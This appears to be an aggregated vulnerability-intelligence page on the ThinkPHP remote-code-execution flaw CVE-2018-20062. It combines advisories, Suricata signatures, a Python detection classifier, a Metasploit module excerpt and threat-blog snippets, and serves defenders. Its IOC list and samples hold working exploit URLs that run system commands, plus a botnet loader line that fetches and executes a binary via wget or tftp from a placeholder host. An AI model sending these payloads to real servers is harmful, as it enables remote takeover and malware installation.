CVE-2018-20062
Published 2018-12-11
Priority: P193 · critical 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-05-03
Exploited in the wild
EPSS: 99.53% (99.9th percentile)
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 5none | nonecms | — | — |
Detection & IOCs (extracted from sources)
- URL: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
- URL (botnet download template; %J, %T, %N and %I are placeholders as given in the source): /?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-r%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J
- Bytes: XOR key 0x87, cumulative byte-wise XOR string encryption
- Detect exploit attempts by looking for HTTP requests to /index.php whose 's' routing parameter names a framework class instead of a controller: '\think\app/invokefunction' together with 'function=call_user_func_array', or '\think\Request/input' together with a 'filter' parameter.
- Alert on HTTP responses from ThinkPHP servers that carry a 404 status code with a body matching 'copyright.*ThinkPHP'; this is the fingerprint attackers use to identify a vulnerable, unpatched instance.
- Monitor web server directories for creation of files named 'roeter.php' or downloads of 'public.txt', both indicators of Dama web shell deployment following exploitation.
- The Dama web shell authenticates with the password 'admin'; POST requests to 'roeter.php' carrying that credential are a detection signal.
- Track the AutoFocus tag 'HideNSeek' to identify related malware samples that carry this ThinkPHP exploit.
- The Metasploit module defaults to port 8080 for ThinkPHP targets, but real-world deployments commonly run on port 80 or 443; adjust RPORT accordingly.
- The module attempts to detect the ThinkPHP version and selects between two distinct exploit paths (invokefunction GET for <=5.0.22, captcha POST for 5.0.23); detection rules must cover both.
- Payload delivery servers in the Dama web shell campaign are themselves compromised ThinkPHP hosts (located in Hong Kong), so blocking those IPs alone is insufficient: the infrastructure rotates through victim nodes.
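The request shapes the notes above describe, checked in code as an added example (not code from any source on this page): a small Python classifier that normalises a request and labels the GET invokefunction path, the GET Request::input/filter path, and the 5.0.23 POST `_method=__construct&filter[]=` path that the Suricata rules further down match. It flags any `function=` value next to `invokefunction`, which is broader than the `call_user_func_array` check above, on the assumption that any callable there is an exploit attempt. The sample requests are constructed for the example and the label strings are this example's own names.

```python
"""Classify web requests as ThinkPHP 5.0.x RCE attempts (CVE-2018-20062 / CVE-2019-9082).

Added example, not code from any source on this page. The request samples
below are constructed; the labels are this example's own names.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The `s` routing parameter naming a framework class instead of a controller is
# the core of the bug. Attackers write the class with or without the leading
# backslashes and in any case, so the backslash is optional and the match is
# case-insensitive.
INVOKEFUNCTION = re.compile(r"think\\?app/invokefunction", re.I)
REQUEST_INPUT = re.compile(r"think\\?request/input", re.I)


def classify_request(method: str, uri: str, body: str = "") -> Optional[str]:
    """Return a label for an exploit-shaped request, or None if it looks benign."""
    parts = urlsplit(uri)
    # Decode twice so %255C-style double encoding cannot hide the class name;
    # unquote_plus is a no-op on text that has no percent escapes.
    decoded = unquote_plus(unquote_plus(parts.path + "?" + parts.query))
    query = parse_qs(parts.query, keep_blank_values=True)

    # Path 1 (<= 5.0.22): \think\app/invokefunction with a callable in function=.
    # Any function= value is flagged, not only call_user_func_array.
    if INVOKEFUNCTION.search(decoded) and "function" in query:
        return "thinkphp-invokefunction"

    # Path 2 (<= 5.0.22): \think\Request/input with filter= naming the callable.
    if REQUEST_INPUT.search(decoded) and "filter" in query:
        return "thinkphp-request-input-filter"

    # Path 3 (5.0.23): POST body that overrides the request method with
    # _method=__construct and injects filter[]=<callable>. This only shows up
    # if request bodies are logged; otherwise rely on a network sensor.
    if method.upper() == "POST":
        form = parse_qs(body, keep_blank_values=True)
        if form.get("_method") == ["__construct"] and any(
            k.startswith("filter") for k in form
        ):
            return "thinkphp-construct-filter-post"
    return None


def scan(requests: List[Tuple[str, str, str]]) -> List[Tuple[int, str]]:
    """Run classify_request over (method, uri, body) records; return (index, label) hits."""
    hits = []
    for n, (method, uri, body) in enumerate(requests, start=1):
        label = classify_request(method, uri, body)
        if label:
            hits.append((n, label))
    return hits


# Constructed sample traffic: three exploit shapes, two encoding variants, two benign requests.
SAMPLE_REQUESTS = [
    ("GET", r"/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id", ""),
    ("GET", r"/?s=index/\think\Request/input&filter=phpinfo&data=1", ""),
    ("POST", "/index.php?s=captcha", "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
    ("GET", "/index.php?s=%2Findex%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1", ""),
    ("GET", "/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id", ""),
    ("GET", "/index.php?s=/index/user/login", ""),
    ("POST", "/index.php?s=/index/user/login", "username=alice&password=hunter2"),
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE_REQUESTS):
        print(f"request {n}: {label}")
```

Standard access logs carry the request line but not the body, so the POST path is only visible here if the web server or a WAF logs bodies; at the perimeter the Suricata signatures listed on this page cover that shape. The GET paths are detectable from any access log that preserves the raw query string.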
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
GHSA
GHSA-gf7c-4w4p-7cm5: An issue was discovered in NoneCms V1
ghsa_unreviewed·2022-05-13
CVE-2018-20062 [CRITICAL] CWE-20 GHSA-gf7c-4w4p-7cm5: An issue was discovered in NoneCms V1
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
VulnCheck
ThinkPHP "noneCms" Remote Code Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" Remote Code Execution Vulnerability
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Affected: ThinkPHP noneCms
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/; https://securityintelligence.com/posts/top-10-cybersecurity-vulnerabilities-2020/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/defaul
CISA
ThinkPHP "noneCms" Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-20062 [CRITICAL] CWE-20 ThinkPHP "noneCms" Remote Code Execution Vulnerability
Vulnerability: ThinkPHP "noneCms" Remote Code Execution Vulnerability
Affected: ThinkPHP noneCms
ThinkPHP "noneCms" contains an unspecified vulnerability that allows for remote code execution through crafted use of the filter parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-20062
Remediation Due Date: 2022-05-03
Suricata
ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)
suricata·2022-05-17·CVSS 9.8
CVE-2018-20062 [CRITICAL] ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)
alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Outbound (CVE-2018-20062)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; http.request_body; content:"_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]"; fast_pattern; nocase; reference:url,www.exploit-db.com/exploits/46150; reference:cve,2018-20062; reference:cve,2019-9082; classtype:web-application-attack; sid:2036599; rev:1; metadata:attack_target Web_Server, created_at 2022_05_17, cve CVE_2018_20062, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_17;)
Suricata
ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)
suricata·2022-05-17·CVSS 9.8
CVE-2018-20062 [CRITICAL] ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Attempted ThinkPHP < 5.2.x RCE Inbound (CVE-2018-20062)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".php"; http.request_body; content:"_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]"; fast_pattern; nocase; reference:url,www.exploit-db.com/exploits/46150; reference:cve,2018-20062; reference:cve,2019-9082; classtype:web-application-attack; sid:2036598; rev:1; metadata:attack_target Web_Server, created_at 2022_05_17, cve CVE_2018_20062, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_17;)
Exploit-DB
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
exploitdb·2020-04-16
CVE-2019-9082 ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  # (rank, mixins and the start of initialize are not part of this excerpt)
        'Name' => 'ThinkPHP Multiple PHP Injection RCEs',
        'Description' => %q{
          This module exploits one of two PHP injection vulnerabilities in the
          ThinkPHP web framework to execute code as the web user.

          Versions up to and including 5.0.23 are exploitable, though 5.0.23 is
          vulnerable to a separate vulnerability. The module will automatically
          attempt to detect the version of the software.

          Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
        },
        'Author' => [
          # Discovery by unknown threaty threat actors
          'wvu' # Module
        ],
        'References' => [
          # https://www.google.com/search?q=thin
Metasploit
ThinkPHP Multiple PHP Injection RCEs
metasploit
ThinkPHP Multiple PHP Injection RCEs
ThinkPHP Multiple PHP Injection RCEs
This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.
Nuclei
ThinkPHP 5.0.23 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-20062 [CRITICAL] ThinkPHP 5.0.23 - Remote Code Execution
ThinkPHP 5.0.23 - Remote Code Execution
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
Template:
id: CVE-2018-20062

info:
  name: ThinkPHP 5.0.23 - Remote Code Execution
  author: dr_set
  severity: critical
  description: |
    An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to complete system comprom
Bleepingcomputer
Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
blogs_bleepingcomputer·2024-06-06·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
## Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells
By Bill Toulas
Chinese threat actors are targeting ThinkPHP applications vulnerable to CVE-2018-20062 and CVE-2019-9082 to install a persistent web shell named Dama.
The web shell enables further exploitation of the breached endpoints, such as enlisting them as part of the attackers' infrastructure to evade detection in subsequent operations.
The first signs of this activity date back to October 2023, but according to Akamai analysts monitoring it, the malicious activity has recently expanded and intensified.
## Targeting old vulnerabilities
ThinkPHP is an open-source web application development framework that is particularly popular in China.
CVE-2018-20062 , fixed in December 2018, is an issue discovered in NoneCM
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
By Lei Xu, Yue Guan, Vaibhav Singhal · Published April 12, 2021
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a deep dive into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
By Yue Guan, Lei Xu, Ken Hsu, Zhibin Zhang · Published January 22, 2021
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
CVE-2019-9081 [CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
By Ken Hsu, Durgesh Sangvikar, Zhibin Zhang, Chris Navarrete · Published June 24, 2020
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc. The sample was compiled on Thursday, June 11, 2020 10:39:47 PM UTC and caught by Palo Alto Networks Next-Generation Firewall. At the time of writing, the campaign’s still ongoing.
Lucifer is quite powerful in its capabilities. Not only is it capable
Unit42
Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
blogs_unit42·2019-06-12·CVSS 9.8
CVE-2018-20062 [CRITICAL] Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
By Ruchna Nigam · Published June 12, 2019
Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE) vulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.
While the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of the CVE-2019-7238 vulnerability being ex
Tenable
Are Your Web Apps Protected Against Component Vulnerabilities?
blogs_tenable·2019-03-21
Are Your Web Apps Protected Against Component Vulnerabilities?
Tenable
ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
blogs_tenable·2019-02-07·CVSS 9.8
CVE-2018-20062 [CRITICAL] ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
# ThinkPHP Remote Code Execution Vulnerability Used To Deploy Variety of Malware (CVE-2018-20062)
Satnam Narang
February 7, 2019
A remote code execution bug in the Chinese open source framework ThinkPHP is being actively used by threat actors to implant a variety of malware, primarily targeting Internet of Things (IoT) devices.
### Background
Over the last few months, attackers have been leveraging CVE-2018-20062, a remote code execution (RCE) vulnerability in Chinese open source PHP framework ThinkPHP, to implant a variety of malware. While the vulnerability was patched on December 9, 2018, a proof of concept (PoC) was published to ExploitDB on December 11.
### Analysis
Shortly after the publication of the PoC, researchers observe
Checkpoint
SpeakUp: A New Undetected Backdoor Linux Trojan
blogs_checkpoint·2019-02-04
CVE-2018-20062 SpeakUp: A New Undetected Backdoor Linux Trojan
## SpeakUp: A New Undetected Backdoor Linux Trojan
Check Point Research has discovered a new campaign exploiting Linux servers to implant a new Backdoor Trojan.
Dubbed ‘SpeakUp’, the new Tro
References:
- http://packetstormsecurity.com/files/157218/ThinkPHP-5.0.23-Remote-Code-Execution.html
- https://github.com/nangge/noneCms/issues/21
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-20062
Published: 2018-12-11
Added to CISA KEV: 2021-11-03
Exploited in the wild